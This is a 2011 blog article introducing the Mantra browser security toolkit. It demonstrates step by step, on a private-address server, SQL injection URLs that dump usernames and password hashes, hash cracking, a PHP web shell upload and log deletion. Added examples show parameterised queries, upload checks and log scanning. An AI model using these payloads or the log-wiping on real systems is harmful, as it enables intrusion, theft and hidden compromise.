Mantra – Free and Open Source Security Framework

February 7, 2011


Right from the beginning, one of the attractive features of Firefox and Google Chrome which made both of them outstanding was their expandability by means of installing useful extensions or add-ons. Programmers and developers started coding add-ons which helped to make the web easier to use and more functional.
Naturally, there were add-ons developed for hackers too. Some became outdated, some were very powerful, and some went unnoticed despite their powerful capabilities. We tried to get all the add-ons of this type available on the internet, installed, analyzed and ranked them, and after that included them in our own security toolkit.

Looking at the total number of exploits being added to the Exploit DB, we think that a browser-based exploit development framework can gain very good acceptance from the security and hacking communities, and this triggered the making of Mantra.

As of now Mantra is just a security toolkit rather than a full-fledged framework. We think it’s always better to give a choice to the end user rather than providing what we think is the best. So once the community is up and we have a crowd, we will go ahead and finalize the basic criteria for the framework and will work on their behalf.

Some of the features of Mantra
1. It’s built on top of the browser – Saves a lot of manpower and flattens the learning curve.
2. It is cross-platform and flexible – It can easily run on Windows, Mac and Linux natively.
3. It’s free as in “free beer” and “free speech”.
4. It’s open source, so you are free to use it or modify it your own way.

What is the use?
By present-day standards, Mantra can be helpful in performing all five phases of attacks like reconnaissance, scanning and enumeration, gaining access, escalation of privileges, maintaining access and covering tracks.

What Mantra is NOT?
1. It’s not a one-click automatic pwnage tool
(please don’t think that it’s a stick in a magician’s hand. Maybe it will be possible for us to make it a one-click pwnage tool, at least for some common types of attacks, in the future. But not now)

2. It’s not mature enough to serve “everything” for a user to perform any sort of attack.

3. It can’t be used as a replacement for your normal browser. It’s not fast enough, does not have plenty of space to play with etc.

4. You can find that there is more than one tool present in the toolkit for performing the same sort of attacks, but at the same time it lacks some simple tools here and there.

Who needs it?
Nice question. If you are into auditing, vulnerability assessment, penetration testing, information security training etc., you are going to benefit from this project. We are looking to bring the attention of security researchers to the possibility of such a platform. If many people use it, the community will definitely grow and we will be able to see more powerful, functional and targeted tools in the near future.

How you can contribute?
Since it’s an open source project, you are encouraged to become a part of it. We need developers for writing code and modifying the extension framework, theme designers for artwork and documentation writers to help better promote the project.

Close Look
The beta version of Mantra Security Toolkit can be downloaded from http://getmantra.com/download/. As of now it’s available for both Linux and Windows platforms. It comes as a self-extracting archive and needs almost zero setup.

The graphical user interface provided by Mantra security toolkit is straightforward and easy to use.

The navigation bar is placed on top of the toolkit and it integrates the search bar into it. Search engines can be switched easily by using keywords or by clicking on their respective icons. As of now it supports searching on XSSed, SecurityFocus, OSVDB, PacketStorm, Pcapr, Exploit-DB, Scroogle, RFC, OVAL etc., apart from normal search engines. It also supports auto-complete and real-time search suggestions.

The sidebar is located on the right side of the toolkit and gives one-click access to all the tools available in the toolkit. Tools can be fine-tuned according to the user’s needs from the sidebar itself. You can see all the tools packed into it at http://getmantra.com/tools/

The status bar at the bottom gives various information about the current webpage including remote IP, location details, technologies used etc. More details about a particular piece of information can be obtained by simply clicking on the respective notification on the status bar. There is also a proxy button to switch between proxies, a Passive Reconnaissance button to conduct packet-less discovery of target resources, a quick profile switcher to play with cookies etc.

A quick demo
In this particular demo we will try to root a remote web server using Mantra security toolkit.
Due to space limitations, I have not included the screenshots. To view them please follow the image links mentioned under every step.
Step 1:
I’m on the home page of the website now.
[code]http://192.168.132.128/[/code]

Step 2:
As of now Mantra does not have any crawling mechanism to find vulnerable URLs on the website (read it as a limitation). So we have to do that manually. I went through all the pages of the web site and found a page with URL input.
[code]http://192.168.132.128/?id=13[/code]

Step 3:
I launched Hackbar by pressing F9. Hackbar is a tool for doing basic audits on web pages.

Step 4:
The power of the single quote. I’m checking whether the web site is actually sanitizing the input or not by putting a ' at the end of the URL and pressing the Execute button.
[code]http://192.168.132.128/?id=13'[/code]

Since the page content is different from the previous one, I can be sure that the web page is not sanitizing the input from the URL.

Step 5:
Let’s find out the number of tables in the current database.
[code]http://192.168.132.128/?id=13 order by 1[/code]

Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice it’s going to be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press the + button till I see any changes on the webpage.
[code]http://192.168.132.128/?id=13 order by 7[/code]

Step 7:
I went up to 7 and no change till now.
[code]http://192.168.132.128/?id=13 order by 7[/code]

Step 8:
I’m on 8 now and now I can see the page changed.
[code]http://192.168.132.128/?id=13 order by 8[/code]

Step 9:
Now let’s go ahead and make a UNION statement. I can make it easily by going to SQL > UNION SELECT STATEMENT

Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exist and there are only 7 tables.

Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Let’s take the number 2.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7[/code]

Step 12:
I replaced number 2 in URL with another SQL command, it got executed and the result is displayed on the page.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7[/code]

The current user is [email protected]

Step 13:
Let’s find out the version of the database. I replaced 2 in the URL with version() command.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7[/code]

5.0.45 is the version

Step 14:
Let me list all the tables.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables[/code]

From this list I found “user” as an interesting table.

Step 15:
Now I listed all the columns and it’s a big list.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns[/code]

Step 16:
I want to filter out columns from the table “user”.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'[/code]

Step 17:
Let’s find the user name.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user[/code]

Step 18:
And password, of course.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user[/code]

It’s encrypted.
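
The flaw that Steps 4 through 18 rely on, shown next to its fix, as an added example that is not part of the original article. The table layout, sample row and function names are constructed, and SQLite stands in for the site's MySQL database; the hardened handler validates the id and binds it as a parameter, so the probe strings from the steps above are rejected instead of being parsed as SQL.

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in for the demo site's database: a 7-column
    # content table plus the "user" table named in the walkthrough.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE events (id INTEGER, c2, c3, c4, c5, c6, c7)")
    db.execute("INSERT INTO events VALUES (13, 'Launch party', 3, 4, 5, 6, 7)")
    db.execute("CREATE TABLE user (user_username, user_password)")
    db.execute("INSERT INTO user VALUES ('admin', 'constructed-hash-value')")
    return db

def fetch_vulnerable(db, raw_id):
    # Flawed pattern: the URL parameter is pasted into the SQL text, so
    # anything after "13" is parsed as part of the statement.
    return db.execute("SELECT * FROM events WHERE id=" + raw_id).fetchall()

def fetch_hardened(db, raw_id):
    # 1) Enforce the expected type before touching the database.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a decimal integer")
    # 2) Bind the value; the driver sends it as data, never as SQL text.
    return db.execute("SELECT * FROM events WHERE id = ?", (int(raw_id),)).fetchall()

def compare(raw_id):
    # Run one input through both handlers and report what each returns.
    db, out = make_db(), {}
    for name, fn in (("vulnerable", fetch_vulnerable), ("hardened", fetch_hardened)):
        try:
            out[name] = fn(db, raw_id)
        except (ValueError, sqlite3.Error) as exc:
            out[name] = type(exc).__name__
    return out

if __name__ == "__main__":
    for probe in ("13", "13 order by 8",
                  "13 UNION SELECT 1,user_password,3,4,5,6,7 from user"):
        print(repr(probe), compare(probe))
```

The database account used by the page should also have no rights on tables it does not need, so that a missed injection point cannot read the credential table.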

Step 19:
Decrypting the password. I’m making a guess here that the password is encrypted using MD5 by looking at the length and other parameters of the data. I copied the MD5 hash, pasted it into the hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com

Step 20:
Voila.!!! I got the password!

Step 21:
Finding the log in page. It was right in front of me.

Step 22:
Logging in with the credentials I have

Step 23:
Greetings.!!!

Step 24:
I’m an admin now. Look at my powers.

Step 25:
Let me add an event.

Step 26:
And of course I want to upload a picture.

Step 27:
Let me test the filtering mechanism of the website again. I’m trying to upload a PHP shell using the facility of the website to upload a custom picture. Let’s see whether it’s possible or not.

Step 28:
Now I’m pressing on “Add Event” button.

Step 29:
Nice. Looks like it got uploaded.

Step 30:
Let’s see where the shell got uploaded to.

Step 31:
I’m trying to get the default upload location.

Step 32:
Looks like I got it.

Let me click on the c9shell.php file I just uploaded.

Step 33:
Voila. I have shell access!!
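
The checks the picture upload in Steps 27 through 33 did not apply, as an added example that is not the site's or Mantra's own code. The function names, size limit and accepted formats are assumptions, and the upload directory is assumed to be one the web server never executes scripts from.

```python
import os
import secrets

# Leading bytes of the only formats this handler accepts, mapped to the
# extension the server will assign.
IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": ".png",
    b"\xff\xd8\xff": ".jpg",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}

def detect_image_ext(data):
    for magic, ext in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return ext
    return None

def store_upload(data, client_name, upload_dir, max_bytes=2 * 1024 * 1024):
    """Store an uploaded picture and return the path it was written to.

    client_name is used only in error text; it never reaches the filesystem.
    upload_dir is assumed to be outside the web root, or configured so that
    the web server serves its files as static content only.
    """
    if len(data) > max_bytes:
        raise ValueError("upload exceeds size limit")
    ext = detect_image_ext(data)
    if ext is None:
        raise ValueError(f"rejected {client_name!r}: not a PNG, JPEG or GIF")
    # Server-chosen random name and extension: a content check by itself is
    # not enough, this is what keeps the stored file from being named *.php.
    path = os.path.join(upload_dir, secrets.token_hex(16) + ext)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path
```

The random name also prevents the guessable default upload location from leading straight to a known filename.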

Step 34:
I simply clicked on the up button to get the root folder.

Now I can do whatever I wish: deface the website, maintain access or whatever.

Step 35:
What I’m interested in is the log folder.

Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks.

Step 37:
Let me go back and edit the log file.

Step 38:
I deleted the complete log entries. Now saving it.

Step 39:
Nice. Log file is empty now.
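
The probes from Steps 4 through 16 leave a recognisable trail, which is why the log was worth emptying. An added example (not from the original article) that scans constructed access-log lines for that trail; the rule names, client addresses and threshold are assumptions, and it is meant to run on a copy of the log shipped off the web server, since a file kept only on the server can be emptied as shown above.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines modelled on the requests in the walkthrough.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Feb/2011:10:00:01 +0000] "GET /?id=13 HTTP/1.1" 200 5120
10.0.0.9 - - [07/Feb/2011:10:00:02 +0000] "GET /?id=13%27 HTTP/1.1" 200 812
10.0.0.9 - - [07/Feb/2011:10:00:05 +0000] "GET /?id=13%20order%20by%201 HTTP/1.1" 200 5120
10.0.0.9 - - [07/Feb/2011:10:00:09 +0000] "GET /?id=13%20order%20by%208 HTTP/1.1" 200 812
10.0.0.9 - - [07/Feb/2011:10:00:15 +0000] "GET /?id=13%20UNION%20SELECT%201,2,3,4,5,6,7 HTTP/1.1" 200 5301
10.0.0.9 - - [07/Feb/2011:10:00:31 +0000] "GET /?id=13+UNION+SELECT+1,table_name,3,4,5,6,7+from+information_schema.tables HTTP/1.1" 200 9920
10.0.0.7 - - [07/Feb/2011:10:01:00 +0000] "GET /news?sort=order HTTP/1.1" 200 2048
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# One rule per stage of the walkthrough. A single hit can be benign
# (an apostrophe in a name), so alerts need several distinct rules.
RULES = {
    "quote_probe": re.compile(r"=[^&]*'"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
}

def scan(log_text, min_rules=2):
    """Return {client_ip: [rule names]} for clients matching >= min_rules rules."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        # Decode %20 and + so encoded probes match the same rules.
        query = unquote_plus(target.partition("?")[2])
        for name, rx in RULES.items():
            if rx.search(query):
                hits[ip].add(name)
    return {ip: sorted(r) for ip, r in hits.items() if len(r) >= min_rules}

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_LOG).items():
        print(ip, rules)
```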

Step 40:
Now, let’s remove the c99 shell by pressing on Self Remove.

Step 41:
Confirmed!!!

Step 42:
OK. Good Bye C99!!!

Step 43:
Well. It got deleted itself.

Happy Hacking.!!! 🙂

If you have any suggestion or query please mail us at [email protected]
Or you can also contact us at:
getmantra.com/forums
twitter.com/getmantra
facebook.com/pages/Mantra/170787489627527

Yashartha Chaturvedi is an Independent cyber security consultant, believes in ethical hacking, provides innovative solutions and knowledge based training to secure computer/mobile from cyber criminals, having an aim to educate the common internet user against the most dangerous security loopholes, vulnerabilities and attacks by publishing regular updates/patches.
